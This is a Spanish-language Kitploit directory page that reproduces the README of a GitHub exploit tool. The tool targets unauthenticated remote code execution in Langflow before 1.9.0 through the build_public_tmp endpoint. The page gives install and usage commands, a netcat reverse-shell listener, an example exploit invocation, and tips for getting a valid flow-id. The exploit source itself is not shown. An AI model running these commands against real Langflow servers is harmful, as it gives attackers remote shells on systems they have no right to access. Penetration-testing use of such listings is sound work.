Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-33017-Exploit — Exploit para ejecución remota de código no autenticada en Langflow <1.9.0 a través del endpoint build_public_tmp, que entrega una shell inversa para pruebas de penetración autorizadas. | Kitploit
Herramientas/GitHubGitHub/diamorphine666/cve-2026-33017-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubdiamorphine666/cve-2026-33017-exploit

CVE-2026-33017-Exploit

Exploit para ejecución remota de código no autenticada en Langflow <1.9.0 a través del endpoint build_public_tmp, que entrega una shell inversa para pruebas de penetración autorizadas.

Ver Repositorio
13hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Fireflow RCE Exploit

Ejecución remota de código para Langflow a través del endpoint build_public_tmp.
Explotación a través del endpoint público de construcción de flujo que ejecuta una reverse shell en el objetivo.

Requisitos

  • Python 3.8+
  • Biblioteca httpx

Instalación:

pip install httpx

Uso

python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>

Argumentos

  • -u, --url : URL base de la instancia de Langflow (ej., https://flow.example.com/)
  • -l, --lhost : Tu dirección IP para recibir la reverse shell
  • -p, --lport : Puerto de escucha para la reverse shell
  • -f --flow-id : ID del flujo objetivo (requerido – obtener de /api/v1/flows/ o de la interfaz)
  • -c --client-id : Valor de la cookie client_id para identificación de sesión

Ejemplo

  1. Inicia un listener:

    nc -nlvp 9001
    
  2. Ejecuta el exploit:

    python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
    
  3. Si tiene éxito, obtienes un shell bash interactivo.

Notas Importantes

  • ReadTimeout es normal – el servidor puede no responder porque el shell bloquea la solicitud HTTP. Mientras veas una conexión en tu listener, el exploit funcionó.
  • Se requiere un flow-id válido. Lista todos los flujos mediante GET /api/v1/flows o cópialo desde la URL del navegador.
  • Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y fines educativos. No la utilices contra sistemas sin permiso explícito.

Versiones Afectadas

  • Versiones de Langflow anteriores a la corrección para RCE de componentes personalizados <1.9.0

Licencia

MIT – para investigación de seguridad educativa y ética.

Descargar herramienta